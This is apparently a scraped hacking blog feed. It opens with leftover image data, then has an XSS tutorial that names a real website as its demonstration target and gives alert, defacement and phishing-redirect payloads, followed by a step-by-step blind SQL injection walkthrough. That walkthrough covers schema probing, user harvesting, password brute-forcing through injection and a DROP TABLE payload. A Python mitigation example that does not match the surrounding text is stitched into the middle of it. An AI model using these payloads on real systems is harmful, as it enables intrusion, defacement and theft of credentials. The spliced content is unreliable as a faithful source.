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
mCC" /> </div> XSS vulnerabilities arise from weak coding in web applications. Once the hacker finds such a vulnerability, he/she injects malicious code (usually through web forms) to steal session cookies, and later uses those cookies to gain access to sensitive page content. <br />Cross Site Scripting (XSS) may be classified into two types:<br /><b>1.</b> Persistent XSS<br /><b>2.</b> Non-Persistent XSS<br />To demonstrate an XSS attack, I will take a website as an example:<br />_____________________________________________________________________<br /><blockquote><a href="http://www.redwrappings.co.in/">http://www.redwrappings.co.in</a></blockquote>_____________________________________________________________________<br /><br /><b>Checking the vulnerability</b><br />The simplest way to check for the vulnerability is to enter the following code in any web form present on the website:<br />_____________________________________________________________________<br /><blockquote><b>&lt;script&gt;alert("XSS")&lt;/script&gt;</b></blockquote>_____________________________________________________________________<br /><div style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp"><img alt="xss cross site scripting" class="size-full wp-image-1666 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp" /></a></div>Once the attacker inserts the code, a dialog box like the one below will appear:<br /><div style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp"><img alt="" class="size-full wp-image-1667 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp" /></a></div><br /><b>Defacement</b><br /><div style="text-align: justify;">Once the attacker has found that the website is vulnerable to an XSS attack, he can do a lot of damage to the website. The most common thing the attacker will do is place his defacement image on
that page to show that the website has been hacked. For this purpose he will insert code similar to the following:</div>__________________________________________________________________ <br /><blockquote><b>&lt;html&gt;&lt;body&gt;&lt;IMG SRC="http://site.com/yourDefaceIMAGE.png"&gt;&lt;/body&gt;&lt;/html&gt;</b></blockquote>___________________________________________________________________<br />Where <b>http://site.com/yourDefaceIMAGE.png</b> is the defacement image.<br /><b>Inserting Flash Videos</b><br />The attacker can also insert flash videos by entering the following code in any web form present on the website<br /><b>Redirection</b><br /><div style="text-align: justify;">The attacker can also redirect the page to any other page. If the hacker has managed to find an XSS vulnerability in a website like paypal.com or alertpay.com, he can redirect that page to a phishing site (a fake login page) where the victim will lose his password. To redirect an XSSed page to another page, the attacker will insert code similar to the following:</div><div style="text-align: justify;">___________________________________________________________________</div><blockquote><b>&lt;script&gt;window.open( "http://www.google.com/" )&lt;/script&gt;</b></blockquote>___________________________________________________________________ <br /><div style="text-align: justify;"><b>Stealing Cookies</b></div><div style="text-align: justify;">After finding a website vulnerable to XSS, most attackers will probably steal victims' cookies to gain access to their accounts or private data. This method is called session hijacking, which is a detailed topic that I will explain in later articles <img alt=":)" class="wp-smiley" src="http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;">I hope you have learned some XSS. Feel free to ask if you have any problem regarding the above information.</div></div>Hacking 
Skills<br />http://www.blogger.com/profile/13163124608674451144<br />noreply@blogger.com<br />tag:blogger.com,1999:blog-289744729559414161.post-7971833708679865057<br />2011-02-18T08:09:00.000-08:00 2011-06-27T20:13:52.750-07:00<br />Cross Site Scripting (XSS) Attack Types<div dir="ltr" style="text-align: left;" trbidi="on"><br />XSS comes in three flavors of persistence, duration and damage. From XSSed they are: <br /><br />Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. <br /><h3>Type-0 attack</h3><br />1. Mallory sends a URL to Alice (via email or another mechanism) of a maliciously constructed web page. <br />2. Alice clicks on the link. <br />3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer. <br />4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone. <br />5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer. <br /><br /><h3>Type-1 attack</h3><br />1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. <br />2. Mallory observes that Bob's website contains a reflected XSS vulnerability. <br />3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (i.e. the email is spoofed). <br />4. Alice visits the URL provided by Mallory while logged into Bob's website. <br />5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script steals sensitive information (authentication credentials, billing info, etc) and sends this to Mallory's web server without Alice's knowledge. <br /><br /><h3>Type-2 attack</h3><br />1. 
Bob hosts a web site which allows users to post messages and other content to the site for later viewing by other members. <br />2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack. <br />3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it. <br />4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's webserver without their knowledge. <br />5. Later, Mallory logs in as other site users and posts messages on their behalf.... <br /><br />Please note, the preceding examples are merely a representation of common methods of exploit and are not meant to encompass all vectors of attack. <br /><br />Good video to watch, keeps things interesting, and XSS vulnerabilities are well worth knowing about, and learning how to defend against. <br /><br />Tags: xssed,xss,cross site scripting,hacking,hack,hacker,vulnerability,info sec,web hacking,web 2.0,fun </div>Hacking Skills<br />http://www.blogger.com/profile/13163124608674451144<br />noreply@blogger.com<br />tag:blogger.com,1999:blog-289744729559414161.post-8084505417777976371<br />2011-02-18T03:41:00.000-08:00 2011-06-27T20:13:52.751-07:00<br />Learn SQL Queries<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vcB-dEFCknUwnHF-yxEzIKEUc5XzLdwpOsyOGC8yadWuhx8bZ8Uf6GBb7UFg3BZtvxjn-okFYxzlZ8OFGTHQhYhDnv6yOfPmOKfcwht50rQrBeiFB4WUn9ppLibZseQRdqm34saEkyM/s1600/sqlinjection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vcB-dEFCknUwnHF-yxEzIKEUc5XzLdwpOsyOGC8yadWuhx8bZ8Uf6GBb7UFg3BZtvxjn-okFYxzlZ8OFGTHQhYhDnv6yOfPmOKfcwht50rQrBeiFB4WUn9ppLibZseQRdqm34saEkyM/s1600/sqlinjection.jpg" /></a></div>"SQL Injection" is a subset of the unverified/unsanitized user input vulnerability 
("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises. <br />We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided. <br />There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of <b>discovery</b> as much as the process of <b>exploitation</b>. <br /><br /><h1 id="target">The Target Intranet</h1>This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code: this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server. <br />The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system. <br />When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since <b>my</b> email address is not found, it wasn't going to send <b>me</b> anything. <br />So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL string literally without sanitizing. When submitting the form with a quote in the email address, we get a 500 error (server failure), and this suggests that the "broken" input is actually being parsed literally. Bingo. 
<br />We speculate that the underlying SQL code looks something like this: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">$EMAIL</span>';<br /></pre>Here, <span class="snip">$EMAIL</span> is the address submitted on the form by the user, and the larger query provides the quotation marks that set it off as a literal string. We don't know the specific <i>names</i> of the fields or table involved, but we do know their <i>nature</i>, and we'll make some good guesses later. <br />When we enter <span class="snip">steve@unixwiz.net'</span> - note the closing quote mark - this yields constructed SQL: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">steve@unixwiz.net'</span>';<br /></pre>When this is executed, the SQL parser finds the extra quote mark and aborts with a syntax error. How this manifests itself to the user depends on the application's internal error-recovery procedures, but it's usually different from "email address is unknown". This error response is a dead giveaway that user input is not being sanitized properly and that the application is ripe for exploitation. <br />Since the data we're filling in appears to be in the <b>WHERE</b> clause, let's change the nature of that clause <i>in an SQL legal way</i> and see what happens. 
By entering <span class="snip">anything' OR 'x'='x</span>, the resulting SQL is: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">anything' OR 'x'='x</span>';<br /></pre>Because the application is not really thinking about the query - merely constructing a string - our use of quotes has turned a single-component <b>WHERE</b> clause into a two-component one, and the <b>'x'='x'</b> clause is <b>guaranteed to be true</b> no matter what the first clause is (there is a better approach for this "always true" part that we'll touch on later). <br />But unlike the "real" query, which should return only a single item each time, this version will essentially return every item in the members database. The only way to find out what the application will do in this circumstance is to try it. Doing so, we were greeted with: <br /><blockquote><hr />Your login information has been mailed to <i>random.person@example.com</i>. <br /><hr /></blockquote>Our best guess is that it's the <i>first</i> record returned by the query, effectively an entry taken at random. This person really did get this forgotten-password link via email, which will probably come as a surprise to him and may raise warning flags somewhere. <br />We now know that we're able to manipulate the query to our own ends, though we still don't know much about the parts of it we cannot see. But we <b>have</b> observed three different responses to our various inputs: <br /><ul><li> "Your login information has been mailed to <i>email</i>" </li><li> "We don't recognize your email address" </li><li> Server error </li></ul>The first two are responses to well-formed SQL, while the latter is for bad SQL: this distinction will be very useful when trying to guess the structure of the query. 
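<br />The three responses can be reproduced offline, and the same form values can be run through a bound-parameter lookup of the kind the Mitigations section recommends. This is an added example, not code from the original article or from the application that was tested; it assumes an in-memory SQLite database, constructed sample rows, and hypothetical function names, and it also applies the email character set listed under "Sanitize the input".

```python
import re
import sqlite3

# Constructed sample rows. The table and column names (members, email, passwd,
# login_id, full_name) are the ones the article arrives at; the SQLite backend
# and every function name below are assumptions of this example.
SAMPLE_MEMBERS = [
    ("random.person@example.com", "s3cret", "random", "Random Person"),
    ("bob@example.com", "hello", "bob", "Bob Example"),
]

# The character set the article's Mitigations section lists for email addresses.
EMAIL_ALLOWED = re.compile(r"[A-Za-z0-9@.\-_+]+")

# The three kinds of form input discussed in the text above.
FORM_INPUTS = [
    "bob@example.com",        # ordinary address
    "steve@unixwiz.net'",     # stray quote
    "anything' OR 'x'='x",    # rewritten WHERE clause
]


def make_db():
    """Create an in-memory members table holding the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE members (email TEXT, passwd TEXT, login_id TEXT, full_name TEXT)"
    )
    db.executemany("INSERT INTO members VALUES (?, ?, ?, ?)", SAMPLE_MEMBERS)
    return db


def lookup_concatenated(db, email):
    """Vulnerable form: the form value is pasted between the quotes."""
    sql = "SELECT email FROM members WHERE email = '" + email + "'"
    return db.execute(sql).fetchone()


def lookup_bound(db, email):
    """Hardened form: the value is bound to a placeholder and never parsed as SQL."""
    sql = "SELECT email FROM members WHERE email = ?"
    return db.execute(sql, (email,)).fetchone()


def respond(lookup, db, email):
    """Map a lookup outcome onto the three responses the article observed."""
    try:
        row = lookup(db, email)
    except sqlite3.Error:
        return "server error"
    if row is None:
        return "address not recognized"
    return "mailed to " + row[0]


def is_allowed_email(value):
    """Accept only values made up entirely of the known-good character set."""
    return EMAIL_ALLOWED.fullmatch(value) is not None


def compare():
    """Return {input: (concatenated response, bound response)} for each input."""
    db = make_db()
    return {
        value: (
            respond(lookup_concatenated, db, value),
            respond(lookup_bound, db, value),
        )
        for value in FORM_INPUTS
    }


if __name__ == "__main__":
    for value, (weak, bound) in compare().items():
        print(f"{value!r:26} concatenated: {weak:36} bound: {bound}")
        print(f"{'':26} passes allow-list: {is_allowed_email(value)}")
```

With bound parameters the server-error and wrong-recipient responses disappear, which removes the signal that distinguishes well-formed from malformed injected SQL.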
<br /><h1 id="map">Schema field mapping</h1>The first steps are to guess some field names: we're reasonably sure that the query includes "email address" and "password", and there may be things like "US Mail address" or "userid" or "phone number". We'd dearly love to perform a <b>SHOW TABLE</b>, but in addition to not knowing the name of the table, there is no obvious vehicle to get the output of this command routed to us. <br />So we'll do it in steps. In each case, we'll show the whole query as we know it, with our own snippets shown specially. We know that the tail end of the query is a comparison with the email address, so let's guess <b>email</b> as the name of the field: <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <i>field</i> = '<span class="snip">x' AND email IS NULL; --</span>';<br /></pre>The intent is to use a proposed field name (<b>email</b>) in the constructed query and find out if the SQL is valid or not. We don't care about matching the email address (which is why we use a dummy <b>'x'</b>), and the <b>--</b> marks the start of an SQL comment. This is an effective way to "consume" the final quote provided by the application and not worry about matching it. <br />If we get a server error, it means our SQL is malformed and a syntax error was thrown: it's most likely due to a bad field name. If we get any kind of valid response, we guessed the name correctly. This is the case whether we get the "email unknown" or "password was sent" response. <br />Note, however, that we use the <b>AND</b> conjunction instead of <b>OR</b>: this is intentional. In the SQL schema mapping phase, we're not really concerned with guessing any particular email addresses, and we do not want random users inundated with "here is your password" emails from the application - this will surely raise suspicions to no good purpose. 
By using the <b>AND</b> conjunction with an email address that couldn't ever be valid, we're sure that the query will always return zero rows and never generate a password-reminder email. <br />Submitting the above snippet indeed gave us the "email address unknown" response, so now we know that the email address is stored in a field <b>email</b>. If this hadn't worked, we'd have tried <b>email_address</b> or <b>mail</b> or the like. This process will involve quite a lot of guessing. <br />Next we'll guess some other obvious names: password, user ID, name, and the like. These are all done one at a time, and anything other than "server failure" means we guessed the name correctly. <br /><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE <b>email</b> = '<span class="snip">x' AND userid IS NULL; --</span>';<br /></pre>As a result of this process, we found several valid field names: <br /><ul><li> email </li><li> passwd </li><li> login_id </li><li> full_name </li></ul>There are certainly more (and a good source of clues is the names of the fields on <b>forms</b>), but a bit of digging did not discover any. But we still don't know the name of the <b>table</b> that these fields are found in - how to find out? <br /><h1 id="findname">Finding the table name</h1>The application's built-in query already has the table name built into it, but we don't know what that name is: there are several approaches for finding that (and other) table names. The one we took was to rely on a <b>subselect</b>. <br />A standalone query of <br /><pre class="codeblock">SELECT COUNT(*) FROM <i>tabname</i><br /></pre>Returns the number of records in that table, and of course fails if the table name is unknown. 
We can build this into our string to probe for the table name: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM <i>table</i><br /> WHERE <b>email</b> = '<span class="snip">x' AND 1=(SELECT COUNT(*) FROM <i>tabname</i>); --</span>';<br /></pre>We don't care how many records are there, of course, only whether the table name is valid or not. By iterating over several guesses, we eventually determined that <b>members</b> was a valid table in the database. But is it the table used in <b>this</b> query? For that we need yet another test using <b>table</b>.<b>field</b> notation: it only works for tables that are actually part of this query, not merely that the table exists. <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x' AND members.email IS NULL; --</span>';<br /></pre>When this returned "Email unknown", it confirmed that our SQL was well formed and that we had properly guessed the table name. This will be important later, but we instead took a different approach in the interim. <br /><h1 id="finduser">Finding some users</h1>At this point we have a partial idea of the structure of the <b>members</b> table, but we only know of one username: the random member who got our initial "Here is your password" email. Recall that we never received the message itself, only the address it was sent to. We'd like to get some more names to work with, preferably those likely to have access to more data. <br />The first place to start, of course, is the company's website to find who is who: the "About us" or "Contact" pages often list who's running the place. Many of these contain email addresses, but even those that don't list them can give us some clues which allow us to find them with our tool. 
<br />The idea is to submit a query that uses the <b>LIKE</b> clause, allowing us to do partial matches of names or email addresses in the database, each time triggering the "We sent your password" message and email. <b>Warning</b>: though this reveals an email address each time we run it, it also actually sends that email, which may raise suspicions. This suggests that we take it easy. <br />We can do the query on email name or full name (or presumably other information), each time putting in the <b>%</b> wildcards that <b>LIKE</b> supports: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x' OR full_name LIKE '%Bob%</span>';<br /></pre>Keep in mind that even though there may be more than one "Bob", we only get to see one of them: this suggests refining our <b>LIKE</b> clause narrowly. <br />Ultimately, we may only need one valid email address to leverage our way in. <br /><h1 id="pass">Brute-force password guessing</h1>One can certainly attempt brute-force guessing of passwords at the main login page, but many systems make an effort to detect or even prevent this. There could be logfiles, account lockouts, or other devices that would substantially impede our efforts, but because of the non-sanitized inputs, we have another avenue that is much less likely to be so protected. <br />We'll instead do actual password testing in our snippet by including the email name and password directly. In our example, we'll use our victim, <b>bob@example.com</b> and try multiple passwords. <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">bob@example.com' AND passwd = 'hello123</span>';<br /></pre>This is clearly well-formed SQL, so we don't expect to see any server errors, and we'll know we found the password when we receive the "your password has been mailed to you" message. 
Our mark has now been tipped off, but we do have his password. <br />This procedure can be automated with scripting in perl, and though we were in the process of creating this script, we ended up going down another road before actually trying it. <br /><h1 id="noro">The database isn't readonly</h1>So far, we have done nothing but <b>query</b> the database, and even though a <b>SELECT</b> is readonly, that doesn't mean that <b>SQL</b> is. SQL uses the semicolon for statement termination, and if the input is not sanitized properly, there may be nothing that prevents us from stringing our own unrelated command at the end of the query. <br />The most drastic example is: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x'; DROP TABLE members; --</span>'; -- Boom!<br /></pre>The first part provides a dummy email address -- <b>'x'</b> -- and we don't care what this query returns: we're just getting it out of the way so we can introduce an unrelated SQL command. This one attempts to drop (delete) the entire <b>members</b> table, which really doesn't seem too sporting. <br />This shows that not only can we run separate SQL commands, but we can also modify the database. This is promising. <br /><h1 id="addnew">Adding a new member</h1>Given that we know the partial structure of the <b>members</b> table, it seems like a plausible approach to attempt adding a new record to that table: if this works, we'll simply be able to login directly with our newly-inserted credentials. 
